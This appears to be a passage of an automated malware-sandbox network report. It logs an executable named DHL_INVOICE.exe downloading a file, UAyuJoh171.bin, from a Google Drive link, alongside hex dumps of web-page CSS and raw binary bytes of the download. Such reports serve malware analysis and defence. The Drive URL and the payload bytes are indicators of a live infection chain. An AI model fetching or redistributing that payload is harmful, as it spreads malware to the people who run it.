                                                                          Aug 10, 2023 19:20:57.879115105 CEST198INData Raw: 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d
                                                                          Data Ascii: gn:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.
                                                                          Aug 10, 2023 19:20:57.879144907 CEST199INData Raw: 6f 63 6b 2d 67 72 6f 75 70 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69
                                                                          Data Ascii: ock-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}
                                                                          Aug 10, 2023 19:20:57.879175901 CEST200INData Raw: 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 62
                                                                          Data Ascii: ;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da
                                                                          Aug 10, 2023 19:20:57.879206896 CEST202INData Raw: 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65
                                                                          Data Ascii: 1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(1
                                                                          Aug 10, 2023 19:20:57.879239082 CEST203INData Raw: 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 44 31 44 31 45 34 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69
                                                                          Data Ascii: g, #EEEADD 0%, #D1D1E4 100%);--wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-y
                                                                          Aug 10, 2023 19:20:57.879270077 CEST204INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75
                                                                          Data Ascii: wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap:
                                                                          Aug 10, 2023 19:20:57.987329006 CEST206INData Raw: 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68
                                                                          Data Ascii: in: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:w


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.2049720142.250.185.110443C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-08-10 17:20:51 UTC0OUTGET /uc?export=download&id=1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2023-08-10 17:20:52 UTC0INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Thu, 10 Aug 2023 17:20:52 GMT
                                                                          Location: https://doc-08-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd9ce1mgklk8prf9qvpmeqekqt/1691688000000/04164905018868905653/*/1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv?e=download&uuid=ab3efce8-7fc0-461d-8cd6-5289dc939099
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-en3W63QIjn17ilTABh25Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.11.2049721142.250.185.129443C:\Users\user\Desktop\DHL_INVOICE.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-08-10 17:20:52 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd9ce1mgklk8prf9qvpmeqekqt/1691688000000/04164905018868905653/*/1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv?e=download&uuid=ab3efce8-7fc0-461d-8cd6-5289dc939099 HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                          Cache-Control: no-cache
                                                                          Host: doc-08-3o-docs.googleusercontent.com
                                                                          Connection: Keep-Alive
                                                                          2023-08-10 17:20:52 UTC2INHTTP/1.1 200 OK
                                                                          X-GUploader-UploadID: ADPycduLDkBvf58YKwmtETLzPxdIJ_2Prn75huPU38kkOYk9sckqLlNQGcjGOLflVJWi8dYIuGxbRkx4BgNG31gsxZchR9hH5Vds
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Type: application/octet-stream
                                                                          Content-Disposition: attachment; filename="UAyuJoh171.bin"; filename*=UTF-8''UAyuJoh171.bin
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 106560
                                                                          Last-Modified: Thu, 10 Aug 2023 06:07:50 GMT
                                                                          Date: Thu, 10 Aug 2023 17:20:52 GMT
                                                                          Expires: Thu, 10 Aug 2023 17:20:52 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=MAx2fg==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2023-08-10 17:20:52 UTC6INData Raw: f1 3a 02 48 ec cb 2f b2 e4 af c0 50 b7 de e8 b0 f0 56 8b 58 9a b4 d6 7a 21 98 8d ec 2a 53 21 77 ef 53 7e af 8f 66 06 e6 a2 36 e0 e0 4d 60 de bf f5 8a d1 c6 be bd 28 79 9c 55 1f 1a ad 2b ec fc d1 1b 55 12 42 8d db f2 e9 fe fb 37 77 81 90 ec e3 8c 11 7c a4 65 04 e3 be 55 ae 1d f8 7d 2a f7 fe b7 4e f8 c9 0a 7f 5a e1 99 fc 75 69 b3 17 c5 ba b4 20 25 21 50 99 a7 95 d8 53 71 33 7c 42 03 4b 41 9b 45 27 2e b0 16 06 d5 c7 11 e2 f5 68 76 27 51 7d 1c 58 42 53 4f eb 08 28 12 67 27 49 db d0 79 d7 3a ca d9 bb 79 bd 99 77 2c b4 78 73 ea bb 6f c9 75 03 cf 1d 03 e4 b2 ea 40 c4 5c 1e 5b ab 65 f6 b0 94 e4 86 a7 a7 44 b5 45 79 f5 6e 35 8c d9 1a 49 d2 6a 6c 78 a5 24 31 13 a0 0f fa dc b4 ba 65 51 d7 7a f4 db 89 21 bc de 7d c7 2c 67 6b 40 97 55 f5 a7 b5 a7 ee 29 e7 b8 80 53 a8
                                                                          Data Ascii: :H/PVXz!*S!wS~f6M`(yU+UB7w|eU}*NZui %!PSq3|BKAE'.hv'Q}XBSO(g'Iy:yw,xsou@\[eDEyn5Ijlx$1eQz!},gk@U)S
                                                                          2023-08-10 17:20:52 UTC10INData Raw: 27 3d 1a 55 b1 5f ea 22 f4 9c 13 e4 1d 0c f0 bc b6 da d2 00 ad 99 93 ea 14 09 c0 38 e3 c9 80 78 02 d0 23 8c da c6 16 49 0e 1e 2b e8 a3 e9 6f 49 7c 98 0d 45 06 98 7f d6 f3 a9 ca 9f f3 20 36 a7 ec 71 b0 46 58 a4 65 15 ed f0 47 14 4f 73 7b f0 3a ca e3 ec 0a bc 5d 57 26 ca 1b c7 ef 59 2d e7 ff 38 9d 6e 34 64 69 57 58 33 a6 40 0c 5e 03 a3 f0 f0 20 16 8f df 61 d3 d9 0c 7f 15 02 a1 81 67 a4 ec 16 40 07 9f 0e e1 66 e8 ed 19 8c ce 34 a4 c4 51 eb 1e de fd 7f 36 0c 7b 14 19 4b 55 2f 06 3a 0a dd 92 e4 52 47 ef 31 b0 73 2a 9f ae 51 e2 0e 1a 3e 15 57 e6 b5 7c 2b 1c 8c 4b bd 1f 7e 64 14 b5 94 ba 9b 35 9c 9b 24 2d bd f0 6d cf da b5 d4 d6 4c 6c 0f 96 8a 72 99 66 d2 36 ff 6e db 7d 89 70 56 d9 68 d8 a7 5d 0c fd 4a d6 35 4a 4d 2f 05 ca 58 1f 5e 43 a5 fa 35 d2 1e 28 0f 38 13
                                                                          Data Ascii: '=U_"8x#I+oI|E 6qFXeGOs{:]W&Y-8n4diWX3@^ ag@f4Q6{KU/:RG1s*Q>W|+K~d5$-mLlrf6n}pVh]J5JM/X^C5(8
                                                                          2023-08-10 17:20:52 UTC14INData Raw: 82 c7 53 a0 06 2d 0b b7 e6 25 46 1b a8 64 fd 2c 3a 58 d5 b1 d3 12 ce 06 4b 83 ff b9 55 95 04 6c d5 bf 78 81 96 f1 99 48 98 9b 56 1b 21 2a be b3 14 77 bd d3 7f 85 f1 69 fe 92 34 e7 3c c8 c7 d5 54 03 fc db 30 72 09 f6 f1 2b 13 f3 af a0 b1 bf 35 82 f9 47 e5 2e e5 98 62 ad db f7 7b a1 8a 4d a9 20 54 45 84 12 66 b6 a1 17 88 90 e7 cd 7e 87 76 f5 a5 a5 9f bc b0 53 f8 5b a8 d1 cd 73 91 5f ae 2d 3c 0d 0e 72 49 18 49 92 7c c9 e9 d6 a2 ee 3b 35 d0 a9 93 cb 1e 25 e3 b8 b1 c9 37 30 01 87 05 bb 19 b1 27 0b 4a 5f cb ea 4b dd dd d3 74 74 3e 80 aa 70 25 54 40 58 0f 17 aa 23 65 00 89 67 71 b9 09 12 6f 1f e9 16 f8 09 57 70 54 eb 5b a5 0b 81 bf 74 bd 4d 89 fd 4b 7a 47 02 c9 ab 1b 54 6b 68 4b 57 31 d0 9d 96 c6 63 5c 6a 59 09 97 64 e1 d3 5d af 42 90 f5 dd 0b 38 a8 f3 9e 1a 40
                                                                          Data Ascii: S-%Fd,:XKUlxHV!*wi4<T0r+5G.b{M TEf~vS[s_-<rII|;5%70'J_Ktt>p%T@X#egqoWpT[tMKzGTkhKW1c\jYd]B8@
                                                                          2023-08-10 17:20:52 UTC18INData Raw: 0d b3 30 be 6f 64 db a6 5a d5 c8 0f 2b 3c 9a 5e 63 2a 1f 1d 4c f8 38 ab a6 39 bb 69 f7 61 02 71 df 9a 45 17 c2 71 f0 dc d1 a2 79 55 4e b4 72 c5 db 65 12 6f 16 f4 38 d9 01 a3 4e b7 de 9c 8b 96 95 75 8b 4a dc 94 b0 63 4a c7 7c 43 28 8d d9 cd 69 ab d1 fc 61 2d a0 98 ce dd 04 6c 04 4b e2 db 5e 72 66 62 e3 a3 6f cb 29 d6 6f d1 84 1d 06 22 cb ae 1a 06 4a 0e 58 61 9f a7 ed e7 95 7f 8c 47 51 14 d4 e7 ff 77 fd 44 03 db 25 7f 90 15 f6 4c e9 e2 4c 1d 65 d3 6c a1 29 1e a1 b3 6e 16 38 cc 82 b5 ff ec db 50 9e b9 99 3a 5b a5 a3 5f 4f 4a 28 b3 20 64 12 7c 06 e5 bd 19 be 6d bd 04 49 87 09 a4 2f 91 17 0f 3d 00 9d 09 97 a8 4b b9 45 22 ea ea b6 de 1c 78 60 cc 07 ca 16 23 45 af cc 86 69 9c 9e ff db 01 b8 14 71 80 c4 97 c7 e9 7b f2 1b 25 dc 73 b0 c1 df 9f 06 b1 cd 1b 9a f6 1c
                                                                          Data Ascii: 0odZ+<^c*L89iaqEqyUNreo8NuJcJ|C(ia-lK^rfbo)o"JXaGQwD%LLel)n8P:[_OJ( d|mI/=KE"x`#Eiq{%s
                                                                          2023-08-10 17:20:52 UTC19INData Raw: a5 3e dd 0b 96 cc cc 28 18 25 a2 8d af 90 ea 19 6c 61 00 01 7b 11 11 66 14 6f 80 08 74 bf fe 71 66 7b 2e 98 43 5c fb 70 84 8f e9 65 82 77 b1 92 87 17 5a ae e3 83 2d e3 f5 83 db b7 9d 8d 32 8a bd d6 1a 8d 7f d5 cb 57 05 60 01 20 2d 23 c5 e0 8e d5 80 04 b4 76 4f d4 92 63 77 16 17 7e c1 74 3a dd 1c fb 47 7c 0c f7 0b 97 16 e3 e1 90 02 f8 20 31 64 fa 07 64 ef c0 bb 09 e7 d8 58 56 95 bb 30 cb 98 f1 a2 52 b1 da 8e 25 d4 d8 b7 ba 2b 7f b7 ba fb e4 05 55 b1 07 44 ac fa 07 19 fe f2 4d 6f 16 5c d9 a7 8f 86 e2 df a3 69 c1 cb da 34 70 d6 8f dd 25 d6 24 91 ce ed df 42 79 9e ad f1 8b 8d 13 7a 5c 94 f2 d6 14 6f 03 08 ee 5a 59 8f 5e da 6f ae ae 0d e2 09 ea ad b6 c7 cb 3b d7 42 8e 15 7e ed b4 2c dc 53 5c a0 fb ed b1 b1 08 d8 b1 d1 98 bf 5e 68 db 3e 14 bd 79 53 b1 32 27 c0
                                                                          Data Ascii: >(%la{fotqf{.C\pewZ-2W` -#vOcw~t:G| 1ddXV0R%+UDMo\i4p%$Byz\oZY^o;B~,S\^h>yS2'
                                                                          2023-08-10 17:20:52 UTC20INData Raw: ff 6a e0 eb 17 5f 02 14 01 e0 64 ac c2 da de 54 28 ed b4 28 dc 96 22 ad 79 b8 b3 18 be e5 06 80 1f 7f 2a 3b 55 1a b2 9a 0d 9d b9 e6 f7 ca bb 9b 97 73 2a 92 b3 fa 0d 86 22 f8 c7 57 2d ad d1 9c ab 82 7c 53 20 81 cb c8 e5 5d 4b 9e 28 45 f5 07 94 e1 e4 99 d1 42 1f e3 7e 0f 65 16 4d d9 06 c1 91 74 75 4c c1 1c b0 74 fc a2 cf e6 76 4b d5 d9 69 f3 2c 27 e5 c9 55 9c 60 b9 02 45 6b 94 d5 da 5e b3 8b 84 d4 f7 0f ae 5c bc 6e 49 9d ae 7b 98 16 42 36 10 6e 58 7c e3 d1 29 f5 6f 60 3f 4f 9c 33 5f c2 e2 76 56 72 48 76 8c 11 98 7e 7e ed ae b1 f8 fb cc 65 b0 15 27 ef 46 fe 01 4d 33 1a fc a4 e3 ec 4a 4d a5 ac e6 8e b4 d1 17 a8 a5 9e 5c 6a 5c e9 cd e6 e6 cc f2 b0 80 f8 ae 12 3b 64 fc aa c2 67 ab ed 1e 09 73 09 c4 8b 1d 8f 68 cb 95 54 5a 4d b5 6b bd d8 24 9b 98 4c e2 d5 df a3
                                                                          Data Ascii: j_dT(("y*;Us*"W-|S ]K(EB~eMtuLtvKi,'U`Ek^\nI{B6nX|)o`?O3_vVrHv~~e'FM3JM\j\;dgshTZMk$L
                                                                          2023-08-10 17:20:52 UTC21INData Raw: 8a a5 f7 a7 19 32 b3 a0 cf 8c 40 12 ea a8 0f e2 55 62 61 01 14 26 28 56 9f 00 75 57 57 60 e1 47 96 f8 e9 c4 a0 72 91 18 c7 1c 0a f9 cd 29 3d 7f 3d 96 83 6f ef f0 4d 2d ed ab f3 70 06 0a 94 5e 30 33 5a e5 d0 eb 64 3f 8b 17 45 14 6e 57 9e 6f c3 f7 4c 02 34 1b da e4 64 1b 28 11 ee 65 8a 8e 33 8a fd 3d 80 f7 42 4a 6f 15 00 78 fe 4c 94 69 7b f4 a1 50 a9 98 52 19 c8 3a d5 4a 50 a7 91 38 63 41 c5 12 cb 81 ea c2 e5 74 be 3c 76 be 18 52 5a 8d 11 7c 2c e3 04 e2 fe 55 f0 46 a5 be 7f 7c 12 e1 c5 8d d9 8f 89 2e c8 ca 77 28 65 e4 9c b8 ae 9f ff af 25 6b 11 e2 86 55 16 62 93 83 37 0b ad dd de b4 d8 10 fc c8 af 6a 81 04 76 9a 49 fd 11 79 03 31 e9 78 bf d1 01 30 00 42 cf 1a 71 e3 c2 9e 37 5f eb ab ce 16 9d 7b d8 b7 f0 36 20 ca 5e 04 bd 50 16 01 6c f1 4b cf e6 cb 35 d6 1a
                                                                          Data Ascii: 2@Uba&(VuWW`Gr)==oM-p^03Zd?EnWoL4d(e3=BJoxLi{PR:JP8cAt<vRZ|,UF|.w(e%kUb7jvIy1x0Bq7_{6 ^PlK5
                                                                          2023-08-10 17:20:52 UTC22INData Raw: dd de a8 3e d2 07 d5 27 99 f7 8e 55 a1 3e 6a 5b a6 ec 37 fa af ce 17 f7 f0 4e e4 5e ea df 35 5d 45 55 9d 60 3e 41 49 07 f7 16 48 c6 5c 1e 0c ee ed 76 1e e3 7e 78 84 d3 17 5c 6b 35 45 fd 58 02 89 ef 1b a4 39 2d 3d 31 5a 85 41 73 5c da 99 5c e6 83 03 01 8d b4 9e 7b ce b0 8c af 58 fa 8a bd 67 64 a5 ba 5e 28 e6 90 88 6c ea 1c cf ee f0 d1 17 ef b5 2b ce f4 54 62 65 6c d5 00 36 84 0e df c2 93 93 33 83 52 9a 94 04 36 f1 eb 33 77 64 5c 0b 0b 30 b7 ee f4 42 b6 76 cb 32 95 e7 ae 29 9e 2a 1e aa 2e 62 71 ea 1c d7 33 92 86 07 4d 99 bc 36 6c 3e 63 c3 e8 69 12 de b3 f4 32 a0 2a 4e b5 cb bc 97 b9 bb 45 3f de 18 ec 92 d5 35 28 18 0a 5c 23 f7 67 e1 1b d2 d5 e7 81 a7 55 e4 8d 30 ee 81 19 4b fe 0b 36 92 51 fd c7 73 76 77 02 0d aa 26 26 90 7c 02 71 60 be 2d cb 50 f3 2d 47 ca
                                                                          Data Ascii: >'U>j[7N^5]EU`>AIH\v~x\k5EX9-=1ZAs\\{Xgd^(l+Tbel63R63wd\0Bv2)*.bq3M6l>ci2*NE?5(\#gU0K6Qsvw&&|q`-P-G
                                                                          2023-08-10 17:20:52 UTC24INData Raw: 7f 35 8b 7c 5e 66 a4 dc ca 09 37 84 09 ad 9f 7d 5c 1b 59 0b 34 3f 3a b3 e3 25 7b 9c 89 70 56 8f 06 17 c6 7d f2 6f ca 6c 20 c6 ae 71 06 49 3d da 1a ee d8 fd 3c df e1 78 82 f6 5b 56 de e9 be 2b e8 b2 d9 e8 88 ec dc 99 91 29 1f f8 98 a7 60 43 cc 76 92 df 22 50 9c 8c 6e 6c e5 0e 49 01 4d 61 33 27 2c 53 ba 40 5c 2a d1 57 cc 17 3e f2 48 c4 53 43 e9 58 5b 36 4b aa 9f 0e fa a1 b6 a6 1d 51 20 0f 18 58 8f fe 58 06 3b dd 29 1f f3 1a 16 b9 b4 d1 9c ad a9 8c b0 6e 80 68 4d 02 20 9a ea 3f 9d 9c fb b7 d2 a9 81 40 a0 69 f7 67 6a a1 37 46 9e a1 c3 f7 53 7e 53 58 42 b3 79 02 93 2d 60 0f 9d 1c 82 fa a0 f7 3d 7d 2d 63 88 23 06 0f 40 60 37 21 33 97 cd db 28 68 02 de fd a8 1c aa f7 e9 9e 74 9c 01 b8 e0 ce 14 6a 4c 6f 82 e9 26 d7 1a 00 e9 e7 c1 7f 32 46 98 70 e9 d7 1a c0 77 df
                                                                          Data Ascii: 5|^f7}\Y4?:%{pV}ol qI=<x[V+)`Cv"PnlIMa3',S@\*W>HSCX[6KQ XX;)nhM ?@igj7FS~SXBy-`=}-c#@`7!3(htjLo&2Fpw
                                                                          2023-08-10 17:20:52 UTC25INData Raw: dd 0b 38 ad db a1 47 02 de 45 90 16 70 3c a8 7d 89 f2 fa 8d b3 c7 b0 62 ab 6d e1 53 01 5d f5 7c 58 e3 a2 2b c2 c5 58 2b 4f 19 0e 48 46 2b 04 2a f8 92 ae 1f 3d 60 88 9b 8e 48 5e 6a b3 db 05 25 b5 22 f5 a8 2b 3a 59 31 40 a3 01 66 84 23 db d5 9c 04 0d 76 ca 75 92 48 7f 16 17 fb 4a 40 5e 74 c2 9e 19 1f 26 13 f7 af 74 fc d6 26 5b ff 1e 15 2c 41 36 cb 5e 0c c2 b0 10 56 d3 b1 97 31 c3 ca 23 53 a1 28 8e af d9 47 79 42 50 0c bd d7 ab bd 06 28 96 e2 6c 38 ee d8 4f 08 19 4c 15 38 bd 08 18 7d 0e 98 e6 0f b1 5f cf bb 52 f7 82 e0 d5 f0 6b 32 4b 81 eb f1 c0 ba 29 0b 7e 52 83 97 b2 b9 24 52 99 91 99 a1 53 a9 08 fa 8f ae 75 8d 73 73 7c ef 76 1b da c2 ed 56 bb 49 47 d7 b6 9c 2c 6d 06 b2 29 74 6b 6e 1a c7 47 63 6e 9e d0 50 84 59 3c 23 2f 33 e7 e5 28 86 b2 40 3d 4a e8 14 e7
                                                                          Data Ascii: 8GEp<}bmS]|X+X+OHF+*=`H^j%"+:Y1@f#vuHJ@^t&t&[,A6^V1#S(GyBP(l8OL8}_Rk2K)~R$RSuss|vVIG,m)tknGcnPY<#/3(@=J
